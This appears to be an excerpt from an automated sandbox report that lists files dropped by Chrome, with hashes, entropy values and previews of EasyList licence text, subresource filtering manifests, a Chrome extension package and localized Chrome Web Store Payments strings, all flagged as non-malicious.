                                                                                                                                                                                                                            SSDEEP:384:mva5sf5dXrCN7tnBxpxkepTqzazijFgZk231Py9zD6WApYbm0:mvagXreRnTqzazWgj0v6XqD
                                                                                                                                                                                                                            MD5:D33AAA5246E1CE0A94FA15BA0C407AE2
                                                                                                                                                                                                                            SHA1:11D197ACB61361657D638154A9416DC3249EC9FB
                                                                                                                                                                                                                            SHA-256:1D4FF95CE9C6E21FE4A4FF3B41E7A0DF88638DD449D909A7B46974D3DFAB7311
                                                                                                                                                                                                                            SHA-512:98B1B12FF0991FD7A5612141F83F69B86BC5A89DD62FC472EE5971817B7BBB612A034C746C2D81AE58FDF6873129256A89AA8BB7456022246DC4515BAAE2454B
                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                            Preview:EasyList Repository Licences.... Unless otherwise noted, the contents of the EasyList repository.. (https://github.com/easylist) is dual licensed under the GNU General.. Public License version 3 of the License, or (at your option) any later.. version, and Creative Commons Attribution-ShareAlike 3.0 Unported, or.. (at your option) any later version. You may use and/or modify the files.. as permitted by either licence; if required, "The EasyList authors.. (https://easylist.to/)" should be attributed as the source of the.. material. All relevant licence files are included in the repository..... Please be aware that files hosted externally and referenced in the.. repository, including but not limited to subscriptions other than.. EasyList, EasyPrivacy, EasyList Germany and EasyList Italy, may be.. available under other conditions; permission must be granted by the.. respective copyright holders to authorise the use of their material.......Creative Commons Attribut
                                                                                                                                                                                                                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                            File Type:ASCII text, with very long lines, with no line terminators
                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                            Size (bytes):1641
                                                                                                                                                                                                                            Entropy (8bit):5.960820521871119
                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                            SSDEEP:48:p/h4IebKC0tH6TGkakQUyXyPtvojkmFz6fdH:RmIeMHwaPUd6j7adH
                                                                                                                                                                                                                            MD5:6977480C932C6C233E72BCD27AB40151
                                                                                                                                                                                                                            SHA1:AFB95CE40A8DC75B3A609C07E506F3C45719683F
                                                                                                                                                                                                                            SHA-256:EC90E259556575C81F6B989F7E0251730A7286BDE2CE50720CFA38E484644EB2
                                                                                                                                                                                                                            SHA-512:965D6788B7910F1FE27F9D4CB3F311C04B1029422174C2ABD1ABBDD562C2776684037A3D36C506FEEF7F6BAE2B020DEBFD43FEEBD6A904FE24E7B537D4BB1C8B
                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                            Preview:[{"description":"treehash per file","signed_content":{"payload":"eyJjb250ZW50X2hhc2hlcyI6W3siYmxvY2tfc2l6ZSI6NDA5NiwiZGlnZXN0Ijoic2hhMjU2IiwiZmlsZXMiOlt7InBhdGgiOiJGaWx0ZXJpbmcgUnVsZXMiLCJyb290X2hhc2giOiJDR2dDUjZpQ1YzT3gtc281bHk2aXo1NU45MFpacHg3TjJjSWZrNmNyd1NvIn0seyJwYXRoIjoiTElDRU5TRS50eHQiLCJyb290X2hhc2giOiIyaWswNmk0TFlCdVNHNWphRGFIS253NE9pdnVSRzZsQ0JKMVk0TGtzRFJJIn0seyJwYXRoIjoibWFuaWZlc3QuanNvbiIsInJvb3RfaGFzaCI6IktBdVZLYTlfRVBXWUM0eHhSZnViZGlTNkp2aUNzVVVwRkVWZndBQ3lMRFUifSx7InBhdGgiOiJtYW5pZmVzdC5qc29ufiIsInJvb3RfaGFzaCI6Imd1VUJDV01mNTlub1p2M3JRVlJsQ3gwdUFWcjdlUjRzNFRGdEx4VnBoUFEifV0sImZvcm1hdCI6InRyZWVoYXNoIiwiaGFzaF9ibG9ja19zaXplIjo0MDk2fV0sIml0ZW1faWQiOiJnY21qa21nZGxnbmtrY29jbW9laW1pbmFpam1tam5paSIsIml0ZW1fdmVyc2lvbiI6IjkuMzUuMCIsInByb3RvY29sX3ZlcnNpb24iOjF9","signatures":[{"header":{"kid":"publisher"},"protected":"eyJhbGciOiJSUzI1NiJ9","signature":"dPaqf1rdJc9ZDJ6G_NiG8qMiRszkbuJQ9viGJwKZUmL6umoX42eImE9lFHWlKnzQp6T-f9zDk3d-3im1Z2hnKtonTmCGV73T8d2b7I7N0lrFnwARV_umlIqB7qCcdtMKC
                                                                                                                                                                                                                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                            File Type:ASCII text, with no line terminators
                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                            Size (bytes):66
                                                                                                                                                                                                                            Entropy (8bit):3.767625222183077
                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                            SSDEEP:3:SQbYGEUfWRjj3WWEA5ajcGn:SQEYfWRjjXgj
                                                                                                                                                                                                                            MD5:69B6F159F9B1421EBD5224D3F61ADCA9
                                                                                                                                                                                                                            SHA1:5F778F3E0B566C638F1C9436F567E17D13F1EC02
                                                                                                                                                                                                                            SHA-256:42B2668908F5B710DDDACB59DCB6547B5BCC247A90102F2E2B2FE0190BE28C23
                                                                                                                                                                                                                            SHA-512:C5D6467D87C25405FE99386EFFD0BB37C0728DECCECA647B6C85DD24BD28D6321B841852ACE3B83EC37D94A8ED9251683D4655AA71D185CB6A156D53B252AE93
                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                            Preview:1.53b83738fad69a9f3db36848834a1d5003880033cae857eadfc37d3802dfcb8c
                                                                                                                                                                                                                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                            File Type:ASCII text
                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                            Size (bytes):115
                                                                                                                                                                                                                            Entropy (8bit):4.563301657145084
                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                            SSDEEP:3:rR6TAulhFphifFHXG7LGMdv5HcDKhtUJKS1Yav:F6VlMZWuMt5SKPS1Yk
                                                                                                                                                                                                                            MD5:8C5308E53C3B2FF7B5C645BB2FF50A01
                                                                                                                                                                                                                            SHA1:2CA75B325F6263E2B2A0C8C4C9FF6161992152F0
                                                                                                                                                                                                                            SHA-256:280B9529AF7F10F5980B8C7145FB9B7624BA26F882B1452914455FC000B22C35
                                                                                                                                                                                                                            SHA-512:DD70A682733891E546B4BEABC73E3D2E3D85810AD9196AE92F7B9722FEC7622F085500F5BEEDCFB44F2EA6EB8953C509C8EE9729567A7E47D88C0C8DC4C19B2A
                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                            Preview:{. "manifest_version": 2,. "name": "Subresource Filtering Rules",. "ruleset_format": 1,. "version": "9.35.0".}.
                                                                                                                                                                                                                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                            File Type:ASCII text
                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                            Size (bytes):115
                                                                                                                                                                                                                            Entropy (8bit):4.563301657145084
                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                            SSDEEP:3:rR6TAulhFphifFHXG7LGMdv5HcDKhtUJKS1Vqn:F6VlMZWuMt5SKPS1kn
                                                                                                                                                                                                                            MD5:9BE1BC3AB4909AFF0167952B7170AC53
                                                                                                                                                                                                                            SHA1:F4A9E494B2E8E9AB52E7DD6EA72DA933470E5572
                                                                                                                                                                                                                            SHA-256:82E50109631FE7D9E866FDEB4154650B1D2E015AFB791E2CE1316D2F156984F4
                                                                                                                                                                                                                            SHA-512:9A3F0104C5D6190DC697B1DC442F3AAD18D6AAD43579344EA569E9925ECDEB640A55DBAA1FFD194EE00479CF68059F1C708EEF80159F90FA0012A5A95E971CFF
                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                            Preview:{. "manifest_version": 2,. "name": "Subresource Filtering Rules",. "ruleset_format": 1,. "version": "9.34.0".}.
                                                                                                                                                                                                                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                            File Type:Google Chrome extension, version 3
                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                            Size (bytes):248531
                                                                                                                                                                                                                            Entropy (8bit):7.963657412635355
                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                            SSDEEP:3072:r+nmRykNgoldZ8GjJCiUXZSk+QSVh85PxEalRVHmcld9R6yYfEp4ABUGDcaKklrv:k3oF4Z4h45P99Fld9RBQYBVcaxlnfL
                                                                                                                                                                                                                            MD5:541F52E24FE1EF9F8E12377A6CCAE0C0
                                                                                                                                                                                                                            SHA1:189898BB2DCAE7D5A6057BC2D98B8B450AFAEBB6
                                                                                                                                                                                                                            SHA-256:81E3A4D43A73699E1B7781723F56B8717175C536685C5450122B30789464AD82
                                                                                                                                                                                                                            SHA-512:D779D78A15C5EFCA51EBD6B96A7CCB6D718741BDF7D9A37F53B2EB4B98AA1A78BC4CFA57D6E763AAB97276C8F9088940AC0476690D4D46023FF4BF52F3326C88
                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                            Preview:Cr24..............0.."0...*.H.............0...........\7c.<........Fto.8.2'5..qk...%....2...C.F.9.#..e.xQ.......[...L|....3>/....u.:T.7...(.yM...?V.<?........1.a...O?d.....A.H..'.MpB..T.m..Vn Ip..>k.|1..n.<Fb..f..*Q1.....s..2..{*.6....Pp....obM..1.......b1.......(.u^.'z......v.F.W.X4."-*eu...b.........\..F!...b...l5....zJ.q.......L].....w[T0.6....E.....r..%Z.vFm.9..5!,.~g5...;.t...']....+A.....u....k...e..&..l.6r[yU...%..f.......N..V.....<+.....l..}.{...z...)y.n..'..).....,.b....5.08K%..O.g..D.S.F5o..<(....>....\f..X..I..2."l...w....7f|.~.c.4.E.......0..0...*.H............0.......).'..b.*$w\$.q&.]zF_2..;...?.U,...W..L1.2...R..#....W.....c1k.$W..$.J....+M!.Hz.n`U.I)N.|b.l....{.K@]6.LlP/....](.A..................I...).H....IQ.y.;MG.d..ix..#f.Z$|..|.?...0K...t"i..s...Y..%.Ky....0...{.!+.~v.;....J.....Z....).(6..@?v.;~..2..c....[0Y0...*.H.=....*.H.=....B..............r...2..+Y.I...k..bR.j5Sl..8.......H"i.-l..`.Q.{...F0D. .0...|!..A..L.+.=...kP.!.1..
                                                                                                                                                                                                                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                            File Type:very short file (no magic)
                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                            Size (bytes):1
                                                                                                                                                                                                                            Entropy (8bit):0.0
                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                            SSDEEP:3:L:L
                                                                                                                                                                                                                            MD5:5058F1AF8388633F609CADB75A75DC9D
                                                                                                                                                                                                                            SHA1:3A52CE780950D4D969792A2559CD519D7EE8C727
                                                                                                                                                                                                                            SHA-256:CDB4EE2AEA69CC6A83331BBE96DC2CAA9A299D21329EFB0336FC02A82E1839A8
                                                                                                                                                                                                                            SHA-512:0B61241D7C17BCBB1BAEE7094D14B7C451EFECC7FFCBD92598A0F13D313CC9EBC2A07E61F007BAF58FBF94FF9A8695BDD5CAE7CE03BBF1E94E93613A00F25F21
                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                            Preview:.
                                                                                                                                                                                                                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                            File Type:Google Chrome extension, version 3
                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                            Size (bytes):248531
                                                                                                                                                                                                                            Entropy (8bit):7.963657412635355
                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                            SSDEEP:3072:r+nmRykNgoldZ8GjJCiUXZSk+QSVh85PxEalRVHmcld9R6yYfEp4ABUGDcaKklrv:k3oF4Z4h45P99Fld9RBQYBVcaxlnfL
                                                                                                                                                                                                                            MD5:541F52E24FE1EF9F8E12377A6CCAE0C0
                                                                                                                                                                                                                            SHA1:189898BB2DCAE7D5A6057BC2D98B8B450AFAEBB6
                                                                                                                                                                                                                            SHA-256:81E3A4D43A73699E1B7781723F56B8717175C536685C5450122B30789464AD82
                                                                                                                                                                                                                            SHA-512:D779D78A15C5EFCA51EBD6B96A7CCB6D718741BDF7D9A37F53B2EB4B98AA1A78BC4CFA57D6E763AAB97276C8F9088940AC0476690D4D46023FF4BF52F3326C88
                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                            Preview:Cr24..............0.."0...*.H.............0...........\7c.<........Fto.8.2'5..qk...%....2...C.F.9.#..e.xQ.......[...L|....3>/....u.:T.7...(.yM...?V.<?........1.a...O?d.....A.H..'.MpB..T.m..Vn Ip..>k.|1..n.<Fb..f..*Q1.....s..2..{*.6....Pp....obM..1.......b1.......(.u^.'z......v.F.W.X4."-*eu...b.........\..F!...b...l5....zJ.q.......L].....w[T0.6....E.....r..%Z.vFm.9..5!,.~g5...;.t...']....+A.....u....k...e..&..l.6r[yU...%..f.......N..V.....<+.....l..}.{...z...)y.n..'..).....,.b....5.08K%..O.g..D.S.F5o..<(....>....\f..X..I..2."l...w....7f|.~.c.4.E.......0..0...*.H............0.......).'..b.*$w\$.q&.]zF_2..;...?.U,...W..L1.2...R..#....W.....c1k.$W..$.J....+M!.Hz.n`U.I)N.|b.l....{.K@]6.LlP/....](.A..................I...).H....IQ.y.;MG.d..ix..#f.Z$|..|.?...0K...t"i..s...Y..%.Ky....0...{.!+.~v.;....J.....Z....).(6..@?v.;~..2..c....[0Y0...*.H.=....*.H.=....B..............r...2..+Y.I...k..bR.j5Sl..8.......H"i.-l..`.Q.{...F0D. .0...|!..A..L.+.=...kP.!.1..
                                                                                                                                                                                                                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                            File Type:UTF-8 Unicode text, with CRLF line terminators
                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                            Size (bytes):796
                                                                                                                                                                                                                            Entropy (8bit):4.864931792423268
                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                            SSDEEP:12:1HEJMLkSlwZGGMLkSlwZ+WYpU34f145Gb+dgoxTyO8ZpU34f1L0frhmJ03OyZnLt:1HE7n4gn8WYpYrbhz8ZpotHOGAOf6aD
                                                                                                                                                                                                                            MD5:6F8E288A9AD5B1ED8633B430E2B4D4CA
                                                                                                                                                                                                                            SHA1:F671D3D4BEFA431D1946D706F4192D44E29B6F08
                                                                                                                                                                                                                            SHA-256:A114E2783D0E9B12155017323BA70838F0F82A71C7EE8DC1F115AE36991241F8
                                                                                                                                                                                                                            SHA-512:0F87F3F0D115B872288949E59ACD3CD41B1FBC64A622D8FDA6D71FAFC5A900D92ADFBB0E7EB926F2A8759BBAA0896D48728FB719BBF5EF54AC21027328F7700C
                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                            Preview:{.. "app_description": {.. "message": "........ . ... ........ .. Chrome".. },.. "app_name": {.. "message": "........ . ... ........ .. Chrome".. },.. "craw_app_unavailable": {.. "message": "........... .... ...... .. .............".. },.. "craw_connect_to_network": {.. "message": "...., ........ .. . ......".. },.. "iap_unavailable": {.. "message": "........... .... ...... .. .......... ....... .. .........".. },.. "jwt_retrieve_failed": {.. "message": "The transaction could not be completed.".. },.. "please_sign_in": {.. "message": "...., ...... . Chrome.".. }..}..
                                                                                                                                                                                                                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                            File Type:UTF-8 Unicode text, with CRLF line terminators
                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                            Size (bytes):675
                                                                                                                                                                                                                            Entropy (8bit):4.536753193530313
                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                            SSDEEP:12:1HEJ0gbbGG0gbb+WYpU34g3YbiLO+dgyGFoO8ZpU34+puiPmb03OyZnLAOfTYABk:1HE5baib6WYpm31Lt0Z8Zp8pxOGAOfKD
                                                                                                                                                                                                                            MD5:1FDAFC926391BD580B655FBAF46ED260
                                                                                                                                                                                                                            SHA1:C95743C3F43B2B099FEBEBC5BD850F0C20E820AC
                                                                                                                                                                                                                            SHA-256:C67898B67F9C9209EAFDA6532B62D5789863CFB855998DD6A70E7775316CEC20
                                                                                                                                                                                                                            SHA-512:39D95D45C5746DA3BAA7AE6A3344EA17D7A7C3569C2A56959FF119261DA08C747A320FCF701AC72B8DBDBF8BF06FD8B239017A282CDDA444F3826D4EC672CBB4
                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                            Preview:{.. "app_description": {.. "message": "Sistema de pagaments de Chrome Web Store".. },.. "app_name": {.. "message": "Sistema de pagaments de Chrome Web Store".. },.. "craw_app_unavailable": {.. "message": "Ara mateix aquesta aplicaci. no est. disponible.".. },.. "craw_connect_to_network": {.. "message": "Connecteu-vos a una xarxa.".. },.. "iap_unavailable": {.. "message": "La funci. Pagaments a l'aplicaci. no est. disponible actualment.".. },.. "jwt_retrieve_failed": {.. "message": "The transaction could not be completed.".. },.. "please_sign_in": {.. "message": "Inicieu la sessi. a Chrome.".. }..}..
                                                                                                                                                                                                                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                            File Type:UTF-8 Unicode text, with CRLF line terminators
                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                            Size (bytes):641
                                                                                                                                                                                                                            Entropy (8bit):4.698608127109193
                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                            SSDEEP:12:1HEJfZGGfZ+WYpU34OBh+dgN/O8ZpU34j05U03OyZnLAOfTYWc:1HEl4G8WYpdt8Zpq5TOGAOfW
                                                                                                                                                                                                                            MD5:76DEC64ED1556180B452A13C83171883
                                                                                                                                                                                                                            SHA1:CFB1E56FD587BCDC459C1D9A683B71F9849058F9
                                                                                                                                                                                                                            SHA-256:32290D69A90E6BAAC428B10382C99221B12773BB9A184F3B93DFB48A4F6D7A40
                                                                                                                                                                                                                            SHA-512:5230A217968D5DC463E2E92D704544311A721E5CEF65C3125CBD8DEB9C0293D3BFB5C820A6011ABF77095FDEE7DAF67D541DC202B0C9CDB0908CBB85D84885CB
                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                            Preview:{.. "app_description": {.. "message": "Platby Internetov.ho obchodu Chrome".. },.. "app_name": {.. "message": "Platby Internetov.ho obchodu Chrome".. },.. "craw_app_unavailable": {.. "message": "Aplikace v sou.asn. dob. nen. dostupn..".. },.. "craw_connect_to_network": {.. "message": "P.ipojte se pros.m k s.ti.".. },.. "iap_unavailable": {.. "message": "Platby v aplikaci aktu.ln. nejsou k dispozici.".. },.. "jwt_retrieve_failed": {.. "message": "The transaction could not be completed.".. },.. "please_sign_in": {.. "message": "P.ihlaste se do Chromu.".. }..}..
                                                                                                                                                                                                                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                            File Type:UTF-8 Unicode text, with CRLF line terminators
                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                            Size (bytes):624
                                                                                                                                                                                                                            Entropy (8bit):4.5289746475384565
                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                            SSDEEP:12:1HEJJMKKFZGGJMKKFZ+WYpU34OHu+dgxlCZO8ZpU34J4Wu03OyZnLAOfTYzD:1HErMKfqMKVWYpM6lL8ZpDNOGAOfiD
                                                                                                                                                                                                                            MD5:238B97A36E411E42FF37CEFAF2927ED1
                                                                                                                                                                                                                            SHA1:4E47AC90BA24C8F4724D9293FA40CFD4ADA66FE0
                                                                                                                                                                                                                            SHA-256:4977D4A053542FF66967FAED6B06585DD70E68E20BFEB533B66FE3287F9655D9
                                                                                                                                                                                                                            SHA-512:FD0742D47B5F5AB9AAD9B4C3D57F63CB693E060EECE123A72036C6E92156D099495C7E9E9CC6DC83EEBCDDCC4B4C81FB47E4C9559DA3EBA024780FFF10C53E0A
                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                            Preview:{.. "app_description": {.. "message": "Betalinger i Chrome Webshop".. },.. "app_name": {.. "message": "Betalinger i Chrome Webshop".. },.. "craw_app_unavailable": {.. "message": "Appen er ikke tilg.ngelig i .jeblikket.".. },.. "craw_connect_to_network": {.. "message": "Opret forbindelse til et netv.rk.".. },.. "iap_unavailable": {.. "message": "Betaling i appen er ikke tilg.ngelig i .jeblikket.".. },.. "jwt_retrieve_failed": {.. "message": "The transaction could not be completed.".. },.. "please_sign_in": {.. "message": "Log ind p. Chrome.".. }..}..
                                                                                                                                                                                                                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                            File Type:UTF-8 Unicode text, with CRLF line terminators
                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                            Size (bytes):651
                                                                                                                                                                                                                            Entropy (8bit):4.583694000020627
                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                            SSDEEP:12:1HEJQ1ZGGQ1Z+WYpU34pCEMT+dgJMlCTO8ZpU34p6FK603OyZnLAOfTYJ6K:1HEzWWYp3Bewv8Zp7k4OGAOfQj
                                                                                                                                                                                                                            MD5:6B3E916E8C1991AA0453CBA00FEDCAAA
                                                                                                                                                                                                                            SHA1:D6366D15912E40CA107FD42BFE9579C3336A51F9
                                                                                                                                                                                                                            SHA-256:A62FFAB910E31531758EEE48B2CC71A8857BEC3021DEAD50B668CBA3C8667053
                                                                                                                                                                                                                            SHA-512:87EA4311B61F29543B13F3E17DFA919D0C320B4FE370CC152E0B1514BCA79B0ABB526DDCF08621D6EBFA48923EE8FB4C667EFB120A72BD9583EEBEE7BFB80552
                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                            Preview:{.. "app_description": {.. "message": "Chrome Web Store-Zahlungen".. },.. "app_name": {.. "message": "Chrome Web Store-Zahlungen".. },.. "craw_app_unavailable": {.. "message": "Die App ist momentan nicht verf.gbar.".. },.. "craw_connect_to_network": {.. "message": "Bitte stellen Sie eine Verbindung zu einem Netzwerk her.".. },.. "iap_unavailable": {.. "message": "In-App-Zahlungen sind momentan nicht m.glich.".. },.. "jwt_retrieve_failed": {.. "message": "The transaction could not be completed.".. },.. "please_sign_in": {.. "message": "Bitte melden Sie sich in Chrome an.".. }..}..
                                                                                                                                                                                                                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                            File Type:UTF-8 Unicode text, with CRLF line terminators
                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                            Size (bytes):787
                                                                                                                                                                                                                            Entropy (8bit):4.973349962793468
                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                            SSDEEP:24:1HEw+aZ+6WYpbWZe80A08ZpCGyDVWlOGAOf+XD:WguYpCZnpEZbGoD
                                                                                                                                                                                                                            MD5:05C437A322C1148B5F78B2F341339147
                                                                                                                                                                                                                            SHA1:AB53003A678E44A170E73711FBD9949833BBF3AA
                                                                                                                                                                                                                            SHA-256:A052C32B4FCAC61152EB0ADB2C260FB6A8256AD104AA0013DB93E9798D41A070
                                                                                                                                                                                                                            SHA-512:C36CB9202A34356DD06D377E2A088F428D0B8EBE7D2E54F8380485E9D94A0598D7F651C1E7A2FD55BE481D49C02B0812F2BA335E08611EC85EE0BD60784A6B40
                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                            Preview:{.. "app_description": {.. "message": "........ ... Chrome Web Store".. },.. "app_name": {.. "message": "........ ... Chrome Web Store".. },.. "craw_app_unavailable": {.. "message": ". ........ .... .. ..... ... ..... ..........".. },.. "craw_connect_to_network": {.. "message": ".......... .. ... .......".. },.. "iap_unavailable": {.. "message": ".. ........ ..... ......... ... ..... ..... .. ...... ...........".. },.. "jwt_retrieve_failed": {.. "message": "The transaction could not be completed.".. },.. "please_sign_in": {.. "message": ".......... ... Chrome.".. }..}..
                                                                                                                                                                                                                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                            File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                            Size (bytes):593
                                                                                                                                                                                                                            Entropy (8bit):4.483686991119526
                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                            SSDEEP:12:1HEJ6GG6+WYpU34OuFpR+dgGfFZO8ZpU34aEGFpR03OyZnLAOfTYdD:1HEVSWYpVp0JS8Zp5KpaOGAOfuD
                                                                                                                                                                                                                            MD5:91F5BC87FD478A007EC68C4E8ADF11AC
                                                                                                                                                                                                                            SHA1:D07DD49E4EF3B36DAD7D038B7E999AE850C5BEF6
                                                                                                                                                                                                                            SHA-256:92F1246C21DD5FD7266EBFD65798C61E403D01A816CC3CF780DB5C8AA2E3D9C9
                                                                                                                                                                                                                            SHA-512:FDC2A29B04E67DDBBD8FB6E8D2443E46BADCB2B2FB3A850BBD6198CDCCC32EE0BD8A9769D929FEEFE84D1015145E6664AB5FEA114DF5A864CF963BF98A65FFD9
                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                            Preview:{.. "app_description": {.. "message": "Chrome Web Store Payments".. },.. "app_name": {.. "message": "Chrome Web Store Payments".. },.. "craw_app_unavailable": {.. "message": "App currently unavailable.".. },.. "craw_connect_to_network": {.. "message": "Please connect to a network.".. },.. "iap_unavailable": {.. "message": "In-App Payments is currently unavailable.".. },.. "jwt_retrieve_failed": {.. "message": "The transaction could not be completed.".. },.. "please_sign_in": {.. "message": "Please sign into Chrome.".. }..}..
                                                                                                                                                                                                                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                            File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                            Size (bytes):593
                                                                                                                                                                                                                            Entropy (8bit):4.483686991119526
                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                            SSDEEP:12:1HEJ6GG6+WYpU34OuFpR+dgGfFZO8ZpU34aEGFpR03OyZnLAOfTYdD:1HEVSWYpVp0JS8Zp5KpaOGAOfuD
                                                                                                                                                                                                                            MD5:91F5BC87FD478A007EC68C4E8ADF11AC
                                                                                                                                                                                                                            SHA1:D07DD49E4EF3B36DAD7D038B7E999AE850C5BEF6
                                                                                                                                                                                                                            SHA-256:92F1246C21DD5FD7266EBFD65798C61E403D01A816CC3CF780DB5C8AA2E3D9C9
                                                                                                                                                                                                                            SHA-512:FDC2A29B04E67DDBBD8FB6E8D2443E46BADCB2B2FB3A850BBD6198CDCCC32EE0BD8A9769D929FEEFE84D1015145E6664AB5FEA114DF5A864CF963BF98A65FFD9
                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                            Preview:{.. "app_description": {.. "message": "Chrome Web Store Payments".. },.. "app_name": {.. "message": "Chrome Web Store Payments".. },.. "craw_app_unavailable": {.. "message": "App currently unavailable.".. },.. "craw_connect_to_network": {.. "message": "Please connect to a network.".. },.. "iap_unavailable": {.. "message": "In-App Payments is currently unavailable.".. },.. "jwt_retrieve_failed": {.. "message": "The transaction could not be completed.".. },.. "please_sign_in": {.. "message": "Please sign into Chrome.".. }..}..
                                                                                                                                                                                                                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                            File Type:UTF-8 Unicode text, with CRLF line terminators
                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                            Size (bytes):661
                                                                                                                                                                                                                            Entropy (8bit):4.450938335136508
                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                            SSDEEP:12:1HEJHlbGGHlb+WYpU34ubdDH+dgxbFxTO8ZpU34lPbdlVo03OyZnLAOfTY6xjD:1HEvaC6WYpcDeEFxq8ZpNl5OGAOffD
                                                                                                                                                                                                                            MD5:82719BD3999AD66193A9B0BB525F97CD
                                                                                                                                                                                                                            SHA1:41194D511F1ACC16C1CA828AC81C18C8C6B47287
                                                                                                                                                                                                                            SHA-256:4DB9B2721E625C18B9E05C04B31AF5D9694712F1CAAF6219ABE34BB08E5DB1C7
                                                                                                                                                                                                                            SHA-512:D4C49B43427799B6292CEED11CACB1D76F7CE43EBF402B43B638A6EB2B414ED0981E386CB8CDF0B51D1BD9552934FE25B2F6392266BB73D8C9A691F65BCE0128
                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                            Preview:{.. "app_description": {.. "message": "Sistema de pagos de Chrome Web Store".. },.. "app_name": {.. "message": "Sistema de pagos de Chrome Web Store".. },.. "craw_app_unavailable": {.. "message": "Esta aplicaci.n no est. disponible en este momento.".. },.. "craw_connect_to_network": {.. "message": "Con.ctate a una red.".. },.. "iap_unavailable": {.. "message": "Los pagos en la aplicaci.n no est.n disponibles en este momento.".. },.. "jwt_retrieve_failed": {.. "message": "The transaction could not be completed.".. },.. "please_sign_in": {.. "message": "Inicia sesi.n en Chrome.".. }..}..
                                                                                                                                                                                                                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                            File Type:UTF-8 Unicode text, with CRLF line terminators
                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                            Size (bytes):637
                                                                                                                                                                                                                            Entropy (8bit):4.47253983486615
                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                            SSDEEP:12:1HEJHlbGGHlb+WYpU34ubdDH+dgxbFxTO8ZpU34GLO03OyZnLAOfTYiJD:1HEvaC6WYpcDeEFxq8Zp4LlOGAOfvD
                                                                                                                                                                                                                            MD5:6B2583D8D1C147E36A69A88009CBEBC7
                                                                                                                                                                                                                            SHA1:4D4DEEB4BE6AA0181825F3371A761ABC5B4D5937
                                                                                                                                                                                                                            SHA-256:6659BC3705311D7641A73995DCFEA80C7734F2F4EBBC3787B3892A240348324F
                                                                                                                                                                                                                            SHA-512:37F0DBFCC1B5A2B8E4C92C49D2D9DEEF25616421350324F57E0149A45A6CCB437F5E3CBE97412C4B5DBBF2593783C7DF71E9C25A851AEAE6E4764C545723FA53
